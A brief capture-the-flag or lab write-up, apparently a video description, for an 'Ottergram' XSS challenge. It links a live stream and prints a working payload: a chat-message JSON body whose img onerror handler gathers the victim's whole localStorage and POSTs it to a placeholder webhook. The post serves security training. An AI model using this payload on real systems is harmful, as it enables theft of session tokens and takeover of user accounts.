Ottergram (XSS) (Live Stream) // 7s26simon

This was originally streamed live. This stream was to show you basically what I did to solve this one. Ignore the match & replace — I was toying with it prior to the lab and *thought* I had it working, but getting it to work in the lab with react was tricky and 100x easier to edit the request in burp after intercepting.. anyway, this was my solution.

https://www.youtube.com/live/R-OsjlGliuM?si=y5B5iGehTcX5krid

Working payload:

{"recipient_id":2,"content":"<img src=x onerror=fetch('INSERT-WEBHOOK-URL-HERE',{method:'POST',mode:'no-cors',body:JSON.stringify(Object.fromEntries(Object.entries(localStorage)))})>"}

As always, please this is for ethical use only where you’re testing with permission. I am not responsible for any actions you take.

Thanks for watching.